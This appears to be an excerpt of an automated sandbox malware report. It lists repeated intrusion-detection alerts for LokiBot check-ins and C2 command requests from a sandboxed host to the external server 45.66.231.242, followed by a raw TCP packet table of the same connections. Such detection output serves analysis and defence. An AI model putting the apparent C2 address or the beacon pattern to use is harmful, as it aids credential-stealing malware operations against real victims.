2024-10-01T10:56:44.963211+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:44.963211+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:44.968018+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49825	TCP
2024-10-01T10:56:45.124436+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:45.124436+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:45.124436+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:45.843694+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:45.843694+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:45.848547+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49826	TCP
2024-10-01T10:56:46.001925+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.001925+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.001925+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.767886+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.767886+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.772733+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49827	TCP
2024-10-01T10:56:46.932311+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:46.932311+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:46.932311+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:47.568144+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:47.568144+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:47.572926+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49828	TCP
2024-10-01T10:56:47.715173+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:47.715173+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:47.715173+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:48.474448+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:48.474448+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:48.479548+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49829	TCP
2024-10-01T10:56:48.656357+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:48.656357+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:48.656357+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:49.332110+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:49.332110+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:49.343834+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49830	TCP
2024-10-01T10:56:49.497277+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:49.497277+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:49.497277+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.153802+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.153802+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.158654+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49831	TCP
2024-10-01T10:56:50.315483+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:50.315483+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:50.315483+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:50.984561+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:50.984561+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:50.989482+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49832	TCP
2024-10-01T10:56:51.139744+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:51.139744+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:51.139744+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:51.881052+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:51.881052+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:51.885896+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49833	TCP
2024-10-01T10:56:52.030835+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.030835+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.030835+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.776756+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.776756+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.789437+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49834	TCP
2024-10-01T10:56:52.933070+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:52.933070+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:52.933070+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:53.773058+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:53.773058+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:53.777994+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49835	TCP
2024-10-01T10:56:53.939406+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:53.939406+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:53.939406+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:54.594825+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:54.594825+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:54.603050+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49836	TCP
2024-10-01T10:56:54.751235+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:54.751235+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:54.751235+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:55.410095+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:55.410095+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:55.414906+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49837	TCP
2024-10-01T10:56:55.562073+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:55.562073+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:55.562073+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:56.206844+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:56.206844+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:56.211771+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49838	TCP
2024-10-01T10:56:56.353977+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:56.353977+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:56.353977+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:57.141032+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:57.141032+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:57.145919+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49839	TCP
2024-10-01T10:56:57.296632+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:57.296632+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:57.296632+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:57.970989+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:57.970989+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:57.976548+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49840	TCP
2024-10-01T10:56:58.123183+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:58.123183+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:58.123183+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:58.804022+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:58.804022+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:58.809435+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49841	TCP
2024-10-01T10:56:59.239027+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:56:59.239027+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:56:59.239027+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:00.074828+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:00.074828+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:00.079904+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49842	TCP
2024-10-01T10:57:00.235929+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:00.235929+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:00.235929+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.013791+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.013791+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.018612+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49843	TCP
2024-10-01T10:57:01.169312+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49844	45.66.231.242	80	TCP
2024-10-01T10:57:01.169312+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49844	45.66.231.242	80	TCP
2024-10-01T10:57:01.169312+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49844	45.66.231.242	80	TCP
2024-10-01T10:57:01.960683+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49844	45.66.231.242	80	TCP
2024-10-01T10:57:01.960683+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49844	45.66.231.242	80	TCP
2024-10-01T10:57:01.965569+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49844	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 10:54:59.005137920 CEST	49730	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:54:59.010060072 CEST	80	49730	45.66.231.242	192.168.2.4
Oct 1, 2024 10:54:59.010134935 CEST	49730	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:54:59.012348890 CEST	49730	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:54:59.017193079 CEST	80	49730	45.66.231.242	192.168.2.4
Oct 1, 2024 10:54:59.017244101 CEST	49730	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:54:59.022166967 CEST	80	49730	45.66.231.242	192.168.2.4
Oct 1, 2024 10:54:59.840167046 CEST	80	49730	45.66.231.242	192.168.2.4
Oct 1, 2024 10:54:59.840212107 CEST	80	49730	45.66.231.242	192.168.2.4
Oct 1, 2024 10:54:59.840322018 CEST	49730	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:54:59.840429068 CEST	49730	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:54:59.845195055 CEST	80	49730	45.66.231.242	192.168.2.4
Oct 1, 2024 10:54:59.996149063 CEST	49731	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:00.004812956 CEST	80	49731	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:00.004878044 CEST	49731	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:00.007311106 CEST	49731	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:00.012356997 CEST	80	49731	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:00.012404919 CEST	49731	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:00.017273903 CEST	80	49731	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:00.929594994 CEST	80	49731	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:00.929619074 CEST	80	49731	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:00.929821014 CEST	49731	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:00.929878950 CEST	49731	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:00.934734106 CEST	80	49731	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:00.999649048 CEST	49732	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.004858017 CEST	80	49732	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.004925013 CEST	49732	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.007904053 CEST	49732	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.012833118 CEST	80	49732	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.012877941 CEST	49732	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.017651081 CEST	80	49732	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.753258944 CEST	80	49732	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.753381968 CEST	80	49732	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.753407955 CEST	49732	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.753448963 CEST	49732	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.758213997 CEST	80	49732	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.917660952 CEST	49733	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.922606945 CEST	80	49733	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.922703981 CEST	49733	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.924715042 CEST	49733	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.929512978 CEST	80	49733	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:01.929584026 CEST	49733	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:01.934422970 CEST	80	49733	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:02.665991068 CEST	80	49733	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:02.666129112 CEST	80	49733	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:02.666162968 CEST	49733	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:02.666260958 CEST	49733	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:02.671005011 CEST	80	49733	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:02.827050924 CEST	49734	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:02.831935883 CEST	80	49734	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:02.832040071 CEST	49734	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:02.833983898 CEST	49734	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:02.838843107 CEST	80	49734	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:02.838931084 CEST	49734	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:02.843694925 CEST	80	49734	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:03.554172993 CEST	80	49734	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:03.554270983 CEST	80	49734	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:03.554359913 CEST	49734	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:03.554361105 CEST	49734	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:03.560722113 CEST	80	49734	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:03.723001003 CEST	49735	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:03.727946997 CEST	80	49735	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:03.728044987 CEST	49735	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:03.730034113 CEST	49735	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:03.734833956 CEST	80	49735	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:03.734896898 CEST	49735	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:03.739672899 CEST	80	49735	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:04.620654106 CEST	80	49735	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:04.620841026 CEST	49735	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:04.620906115 CEST	80	49735	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:04.620963097 CEST	49735	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:04.625680923 CEST	80	49735	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:04.779931068 CEST	49736	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:04.784817934 CEST	80	49736	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:04.784925938 CEST	49736	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:04.786977053 CEST	49736	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:04.791835070 CEST	80	49736	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:04.791908979 CEST	49736	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:04.796772957 CEST	80	49736	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:05.540540934 CEST	80	49736	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:05.540565968 CEST	80	49736	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:05.540676117 CEST	49736	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:05.540767908 CEST	49736	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:05.545578003 CEST	80	49736	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:05.701622963 CEST	49737	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:05.706940889 CEST	80	49737	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:05.707034111 CEST	49737	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:05.709995985 CEST	49737	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:05.714792967 CEST	80	49737	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:05.714855909 CEST	49737	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:05.719599009 CEST	80	49737	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:06.533355951 CEST	80	49737	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:06.533435106 CEST	80	49737	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:06.533520937 CEST	49737	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:06.533520937 CEST	49737	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:06.538355112 CEST	80	49737	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:06.677113056 CEST	49738	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:06.682061911 CEST	80	49738	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:06.682199001 CEST	49738	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:06.685117960 CEST	49738	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:06.689907074 CEST	80	49738	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:06.689995050 CEST	49738	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:06.694802999 CEST	80	49738	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:10.377545118 CEST	80	49738	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:10.377639055 CEST	80	49738	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:10.377697945 CEST	49738	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:10.377698898 CEST	49738	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:10.382539034 CEST	80	49738	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:10.527427912 CEST	49739	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:10.532444954 CEST	80	49739	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:10.532527924 CEST	49739	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:10.534509897 CEST	49739	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:10.539371967 CEST	80	49739	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:10.539446115 CEST	49739	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:10.544219971 CEST	80	49739	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:11.258225918 CEST	80	49739	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:11.258290052 CEST	80	49739	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:11.258338928 CEST	49739	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:11.258383989 CEST	49739	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:11.263233900 CEST	80	49739	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:11.414808989 CEST	49740	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:11.421185970 CEST	80	49740	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:11.421406984 CEST	49740	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:11.424407005 CEST	49740	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:11.431348085 CEST	80	49740	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:11.431406975 CEST	49740	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:11.438359976 CEST	80	49740	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.104274988 CEST	80	49740	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.104351997 CEST	80	49740	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.104379892 CEST	49740	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:12.104410887 CEST	49740	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:12.109160900 CEST	80	49740	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.278179884 CEST	49741	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:12.283271074 CEST	80	49741	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.283353090 CEST	49741	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:12.286014080 CEST	49741	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:12.290865898 CEST	80	49741	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.290925980 CEST	49741	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:12.295752048 CEST	80	49741	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.998677969 CEST	80	49741	45.66.231.242	192.168.2.4
